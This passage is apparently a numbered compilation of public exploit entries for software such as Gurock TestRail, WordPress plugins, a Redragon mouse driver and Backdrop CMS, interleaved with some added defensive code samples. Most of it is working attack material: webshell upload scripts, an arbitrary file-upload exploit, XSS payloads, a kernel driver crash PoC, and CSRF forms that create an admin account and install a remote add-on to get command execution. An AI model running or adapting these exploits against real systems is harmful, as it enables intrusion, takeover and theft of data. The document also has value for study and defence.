upload = s.post(LINK+'system/system/admins/assessments/databank/btn_functions.php?action=add', cookies=cookies, files=phpshell, data=data)
shell_upload = True if ("" in upload.text) else False
u = shell_upload
if u:
    print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
    print(RED+"[-]Failed To Upload The PHP Shell!", RESET)

#Executing The Webshell
webshell(LINK, s)
  13. # Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
# Date: 22/09/2022
# Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii)
# Vendor Homepage: https://www.gurock.com/testrail/
# Version: 7.2.0.3014 and below
# Tested on: macOS, Linux, Windows
# CVE : CVE-2021-40875
# Reference: https://johnjhacking.com/blog/cve-2021-40875/

CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.

# Method 1

#!/bin/bash
# Author: sickcodes & johnjhacking
# Contact: https://twitter.com/sickcodes
# https://github.com/SakuraSamuraii/derailed
# Copyright: sickcodes (C) 2021
# License: GPLv3+

# stop null byte error while curling
shopt -s nullglob

! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; }

TARGET="${1}"

wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt

FILE_LIST="${PWD}/files.md5.txt"

mkdir -p ./output
cd ./output

touch ./accessible.log

# option to get a fresh updated files.md5, if it comes in a future version
# curl "${TARGET}/files.md5" > ./files.md5

while read -r HASH SUFFIX; do

    echo "${SUFFIX}"

    TESTING_URL="${TARGET}/${SUFFIX}"

    echo "========= ${TESTING_URL} ========="

    # Ignore list, some of these files MAY be world readable,
    # if the organisation has modified permissions related
    # to the below files otherwise, they are ignored.
    case "${SUFFIX}" in
        *'.php' ) continue
        ;;
        *'.html' ) continue
        ;;
        *'LICENSE' ) continue
        ;;
        *'README.md' ) continue
        ;;
        *'.js' ) continue
        ;;
        *'.svg' ) continue
        ;;
        *'.gif' ) continue
        ;;
        *'.png' ) continue
        ;;
        *'.css' ) continue
        ;;
        *'.exe' ) continue
        ;;
        # *'.add_your_own' ) continue
        # ;;
    esac

    # peek at page response
    # doesn't work because gurock returns 200 and prints the error in plaintext
    # curl -s -I -X POST "${TESTING_URL}"

    # fetch the page, following redirects, to a variable
    OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")"

    # find matching disqualifying phrases in the page contents
    # and pass any pages that are "denied access" or "direct script access"
    case "${OUTPUT_DATA}" in
        *'No direct script'* ) continue
        ;;
        *'Directory Listing Denied'* ) continue
        ;;
    esac

    # save all interesting pages, without forward slashes
    # https://www.target/
    # will be saved as:
    # https:::www.target:
    tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}"

    # print to stdout, and also append to ./accessible.log the successful saves
    tee -a ./accessible.log <<< "${TESTING_URL}"

done < "${FILE_LIST}"

### Results

In your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below.
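The script above walks a `files.md5` manifest (`<md5> <path>` per line) and fetches every path that is not on its ignore list. The defensive counterpart is to read the same manifest and turn it into a deny list, so that neither the manifest nor the non-public files it enumerates can be fetched directly. The following is an added example, not part of the advisory or of TestRail; the manifest text, the `PUBLIC_EXTENSIONS` set (which mirrors the script's ignore list) and the `SENSITIVE_HINTS` substrings are constructed for the illustration.

```python
import re

# Extensions a browser legitimately fetches from a PHP web app
# (constructed list, mirroring the ignore list in the bash script above).
PUBLIC_EXTENSIONS = {"php", "html", "js", "css", "svg", "gif", "png", "ico", "woff", "woff2"}

# Substrings that mark files which should never be served directly, even when the
# extension looks harmless (a config .php file leaks as text if PHP is misconfigured).
SENSITIVE_HINTS = ("config", ".sql", "install", "backup", ".ini", ".env", ".log", "credential")

# One manifest line: a 32-hex-digit MD5, whitespace, then the relative path.
MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{32})\s+(\S.*)$")


def parse_manifest(text):
    """Parse '<md5> <path>' lines, the format the bash loop reads with `read -r HASH SUFFIX`.
    Malformed lines are skipped rather than guessed at."""
    entries = []
    for line in text.splitlines():
        match = MANIFEST_LINE.match(line.strip())
        if not match:
            continue
        path = match.group(2).strip()
        if path.startswith("./"):
            path = path[2:]
        entries.append((match.group(1).lower(), path))
    return entries


def classify(path):
    """'sensitive' if the name carries a sensitive hint, 'public' if the extension is one a
    browser legitimately loads, otherwise 'review' (anything else the manifest exposes)."""
    lower = path.lower()
    if any(hint in lower for hint in SENSITIVE_HINTS):
        return "sensitive"
    filename = lower.rsplit("/", 1)[-1]
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return "public" if ext in PUBLIC_EXTENSIONS else "review"


def nginx_deny_block(entries):
    """Render exact-match nginx locations that answer 404 for the manifest itself and for
    every non-public path it lists, so the manifest cannot serve as a map of the install."""
    lines = ["location = /files.md5 { return 404; }"]
    for _digest, path in entries:
        verdict = classify(path)
        if verdict != "public":
            lines.append(f"location = /{path} {{ return 404; }}  # {verdict}")
    return "\n".join(lines)


# Constructed sample manifest (digests are arbitrary; one line is deliberately malformed).
SAMPLE_MANIFEST = """\
d41d8cd98f00b204e9800998ecf8427e index.php
0cc175b9c0f1b6a831c399e269772661 app/Config/database.php
92eb5ffee6ae2fec3ad71c777531578f install/schema.sql
4a8a08f09d37b73795649038408b5f33 css/style.css
malformed line without a digest
8277e0910d750195b448797616e091ad docs/CHANGELOG.txt
"""

if __name__ == "__main__":
    print(nginx_deny_block(parse_manifest(SAMPLE_MANIFEST)))
```

The generated block is a stop-gap for an unpatched host; the vendor fix is still required, and the `review` entries are meant to be checked by a person before the rules go live.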
  14. # Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
    print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text
    if ("jsonrpc" in raw):
        return True;
    else:
        return False;

def main():
    print_banner()
    if(len(sys.argv) != 3):
        print_usage();
        sys.exit(1);

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = 'p3dlite_handle_upload'
    admin = '/wp-admin/admin-ajax.php';

    uri = base + admin + '?action=' + ajax_action ;

    check = vuln_check(uri);
    if(check == False):
        print("(*) Target not vulnerable!");
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'file' : open(file_path)}

    print("Uploading Shell...");
    response = requests.post(uri, files=files)
    file_name = path.basename(file_path)
    if(file_name in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + "wp-content/uploads/p3d/" + file_name);
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main();
  15. # Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169

1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
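The payload in the PoC works because the `tab` value is written into the page inside an existing script element, so `</script>` ends that element and the rest is parsed as new markup. The added example below is not the plugin's code or the author's: it shows the vulnerable rendering pattern next to the hardened one (validate `tab` against a fixed allowlist, then entity-encode it before it touches HTML). The `ALLOWED_TABS` names and the markup templates are constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Tabs the admin page actually offers (constructed allowlist for this example).
ALLOWED_TABS = ("export", "profiles", "settings")


def tab_from_url(url: str) -> str:
    """Extract the raw `tab` query parameter from a request URL ('' when absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("tab", [""])[0]


def render_unsafe(url: str) -> str:
    """Vulnerable pattern: the parameter is interpolated straight into an inline script.
    A value such as </script><script>alert(1)</script> closes the page's own script
    element and the remainder is parsed as markup the attacker chose."""
    tab = tab_from_url(url)
    return f'<script>var activeTab = "{tab}";</script>'


def render_safe(url: str) -> str:
    """Hardened pattern: unknown tab names fall back to the default, and the value is
    entity-encoded (quotes included) before being placed in an HTML attribute, so it
    can neither break out of the attribute nor introduce a new element."""
    tab = tab_from_url(url)
    if tab not in ALLOWED_TABS:
        tab = ALLOWED_TABS[0]
    return f'<div class="tabs" data-active-tab="{html.escape(tab, quote=True)}"></div>'


def contains_injected_script(rendered: str) -> bool:
    """Demonstration check: more <script> elements than the template's own, or an alert() call."""
    return rendered.count("<script") > 1 or "alert(" in rendered


# The PoC URL from the advisory above, with a constructed host.
POC_URL = "https://example.test/wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(render_unsafe(POC_URL))
    print(render_safe(POC_URL))
```

Encoding alone would also neutralise this specific payload, but the allowlist is what makes the parameter safe in every output context the page might use it in, which is why the hardened version does both.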
  16. # Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
# Date: 27/08/2021
# Exploit Author: Quadron Research Lab
# Version: all version
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.redragonzone.com/pages/download
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE

import ctypes, sys
from ctypes import *
import io
from itertools import product
from sys import argv

devicename = "REDRAGON_MOUSE"
ioctl = 0x222414

kernel32 = windll.kernel32
hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:
    print ("Not Win! Sorry!")
else:
    print ("OPENED!")
    buf = '\x44' * 1000 + '\x00' * 1000
    bufLength = 2000
    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
  17. # Exploit Title: Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Exploit Author: V1n1v131r4
# Date: 2021-09-22
# Vendor Homepage: https://backdropcms.org/
# Software Link: https://github.com/backdrop/backdrop/releases/download/1.20.0/backdrop.zip
# Version: 1.20.0
# Tested On: Kali Linux, Ubuntu 20.04
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to add new user with Admin powers.
# Description: Backdrop CMS suffers from an Cross-site Request Forgery Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously add-on with crafted PHP file.

<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=admin/people/create">
  <input type="text" name="q" value="admin/people/create">
  <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
  <input type="text" name="name" value="hacker">
  <input type="text" name="mail" value="[email protected]">
  <input type="text" name="notify" value="1">
  <input type="text" name="pass" value="admin">
  <input type="text" name="form_build_id" value="form-fPIKc40E3Yp2JOBgAd6gFbMJFsihncTANLNRWwPRWIY">
  <input type="text" name="form_token" value="AtrGRG9-8zS8-GoKbYL3niPjqnZP2zTirEqB4E_kS9I">
  <input type="text" name="form_id" value="user_register_form">
  <input type="text" name="status" value="1">
  <input type="text" name="roles[administrator]" value="administrator">
  <input type="text" name="op" value="Create new account">
  <input type="submit" value="Send">
</form>
</body>
</html>

# Step 1
# Send this page below to the victim

<html>
<body>
<form method="POST" action="http://example.com/backdrop/?q=system/ajax">
  <input type="text" name="q" value="system/ajax">
  <input type="text" name="Backdrop.tableDrag.showWeight" value="0">
  <input type="text" name="SESSaca5a63f4c2fc739381fab7741d68783" value="4IVp_-QA9bzSPmMyXalKTNS3BNFTQnxJTw8t93Gi6c8">
  <input type="text" name="bulk" value="">
  <input type="text" name="project_url" value="https://github.com/V1n1v131r4/CSRF-to-RCE-on-Backdrop-CMS/releases/download/backdrop/reference.tar">
  <input type="text" name="files[project_upload]" value="">
  <input type="text" name="form_build_id" value="form-p-BrvXTDPqUhhAatHFr4d_dQKt6Dn5d-mIf4hwFyuJA">
  <input type="text" name="form_token" value="aYigpmZz3OXNHnjJTO2Tu43IXMKyrMXvB2yL-4NFbTw">
  <input type="text" name="form_id" value="installer_manager_install_form">
  <input type="text" name="_triggering_element_name" value="op">
  <input type="text" name="_triggering_element_value" value="Install">
  <input type="text" name="ajax_html_ids[]" value="skip-link">
  <input type="text" name="ajax_html_ids[]" value="main-content">
  <input type="text" name="ajax_html_ids[]" value="installer-browser-filters-form">
  <input type="text" name="ajax_html_ids[]" value="edit-search-text">
  <input type="text" name="ajax_html_ids[]" value="edit-submit">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-bootstrap_lite">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-corporate_kiss">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lateral">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-colihaut">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-shasetsu">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-borg">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-pelerine">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-cleanish">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-materialize">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-lumi">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-tatsu">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-mero">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-snazzy">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-afterlight_tribute">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-minicss">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-zurb_foundation_6">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-thesis">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-summer_fun">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-news_arrow">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-ajax">
  <input type="text" name="ajax_html_ids[]" value="title-link">
  <input type="text" name="ajax_html_ids[]" value="add-to-queue-link-basis_contrib">
  <input type="text" name="ajax_html_ids[]" value="installer-browser-manual-install-link">
  <input type="text" name="ajax_html_ids[]" value="edit-link">
  <input type="text" name="ajax_html_ids[]" value="admin-bar">
  <input type="text" name="ajax_html_ids[]" value="admin-bar-wrapper">
  <input type="text" name="ajax_html_ids[]" value="admin-bar-icon">
  <input type="text" name="ajax_html_ids[]" value="admin-bar-menu">
  <input type="text" name="ajax_html_ids[]" value="admin-bar-extra">
  <input type="text" name="ajax_html_ids[]" value="admin-bar-search-items">
  <input type="text" name="ajax_html_ids[]" value="ui-id-1">
  <input type="text" name="ajax_html_ids[]" value="backdrop-modal">
  <input type="text" name="ajax_html_ids[]" value="installer-manager-install-form">
  <input type="text" name="ajax_html_ids[]" value="edit-bulk-wrapper">
  <input type="text" name="ajax_html_ids[]" value="edit-bulk">
  <input type="text" name="ajax_html_ids[]" value="edit-project-url-wrapper">
  <input type="text" name="ajax_html_ids[]" value="edit-project-url">
  <input type="text" name="ajax_html_ids[]" value="edit-project-upload-wrapper">
  <input type="text" name="ajax_html_ids[]" value="edit-project-upload">
  <input type="text" name="ajax_html_ids[]" value="edit-actions">
  <input type="text" name="ajax_html_ids[]" value="edit-submit--2">
  <input type="text" name="ajax_page_state[theme]" value="seven">
  <input type="text" name="ajax_page_state[theme_token]" value="RY9h420qjWmejTKFp7C0ytS__FtpWnVmEjVCnHWFblo">
  <input type="text" name="ajax_page_state[css][core/misc/normalize.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/system/css/system.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/system/css/system.theme.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/system/css/messages.theme.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/system/css/system.admin.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/layout/css/grid-flexbox.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/contextual/css/contextual.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/comment/css/comment.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/date/css/date.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/field/css/field.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/search/search.theme.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/user/css/user.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/views/css/views.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/admin_bar/css/admin_bar-print.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/layouts/boxton/boxton.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/modules/installer/css/installer.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/themes/seven/css/seven.base.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/themes/seven/css/style.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/themes/seven/css/responsive-tabs.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/opensans/opensans.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.core.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.button.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.draggable.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.resizable.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.dialog.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/dialog.theme.css]" value="1">
  <input type="text" name="ajax_page_state[css][core/misc/ui/jquery.ui.theme.css]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/html5.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery-extend-3.4.0.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery-html-prefilter-3.5.0.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery.once.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/backdrop.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/modules/layout/js/grid-fallback.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ajax.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery.form.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/modules/contextual/js/contextual.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/form.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/modules/admin_bar/js/admin_bar.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/modules/installer/js/installer.project_list.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/progress.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/tableheader.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/dismiss.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/themes/seven/js/script.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.data.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.disable-selection.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.labels.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.scroll-parent.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.tabbable.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.unique-id.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.version.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.escape-selector.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.focusable.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.form-reset-mixin.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.ie.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.keycode.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.plugin.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-active-element.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.safe-blur.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.widget.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/textarea.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.button.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.mouse.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/jquery.ui.touch-punch.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.draggable.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.position.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.resizable.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/ui/jquery.ui.dialog.min.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/dialog.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/dialog.ajax.js]" value="1">
  <input type="text" name="ajax_page_state[js][core/misc/collapse.js]" value="1">
  <input type="submit" value="Send">
</form>
</body>
</html>

Run on your browser: http://example.com/backdrop/modules/reference/shell.php?cmd=[command] to execute remote commands.
  18. # Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
# Date: 2/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/fitness-calculators/
# Version: 1.9.5
# Tested on: Windows 10
# CVE: CVE-2021-24272

1. Description:
The plugin adds calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking a CSRF check, allowing attackers to make logged-in users perform unwanted actions, such as changing the calculator headers. Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue.

2. Proof of Concept:
<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
  <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
  <input type="submit" value="Save" name="submit">
</form>
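Both CSRF entries above (the Backdrop CMS forms and the Fitness Calculators form) rely on the same weakness: a state-changing POST is accepted on the strength of the victim's session cookie alone. The added example below is not code from either project; it is a minimal server-side check that a state-changing request handler would run before acting, in two layers: the `Origin` (or, failing that, `Referer`) header must name the site itself, and the form must carry a per-session synchronizer token compared in constant time. `SITE_ORIGIN`, the request dictionaries and the form field names are constructed for the illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# The origin the admin UI is served from (constructed for this example).
SITE_ORIGIN = "https://example.com"


def issue_csrf_token(session):
    """Create a per-session synchronizer token and keep it server-side; the page
    embeds it in every state-changing form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers):
    """Browsers attach Origin to cross-site POSTs and the attacker's page cannot
    change it, so a foreign Origin (or Referer when Origin is absent) is rejected.
    Requests carrying neither header are rejected too rather than assumed safe."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def csrf_check(session, headers, form):
    """Return (accepted, reason) for a state-changing POST. Both layers must pass."""
    if not origin_allowed(headers):
        return False, "origin mismatch"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # compare_digest avoids leaking the token through timing differences.
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "bad or missing csrf token"
    return True, "ok"


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Legitimate same-origin submission that includes the token.
    print(csrf_check(session, {"Origin": SITE_ORIGIN},
                     {"csrf_token": token, "fcw[fcw_heading]": "Water"}))
    # A form hosted on another site, like the PoC pages above: no token, foreign Origin.
    print(csrf_check(session, {"Origin": "https://third-party.example"},
                     {"fcw[fcw_heading]": "<script>alert(1)</script>"}))
```

The token must be bound to the session, as here, rather than a static per-form value: a token that any visitor can read off the public form is no protection at all. The stored-XSS half of the Fitness Calculators issue is a separate defect (missing output encoding on the saved heading) that the CSRF check does not address.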
  19. # Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Tested on: Linux
# Version: 2.0
# Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.

# PoC request

POST /expense_budget/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/expense_budget/admin/?page=user
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
Content-Length: 824
Connection: close
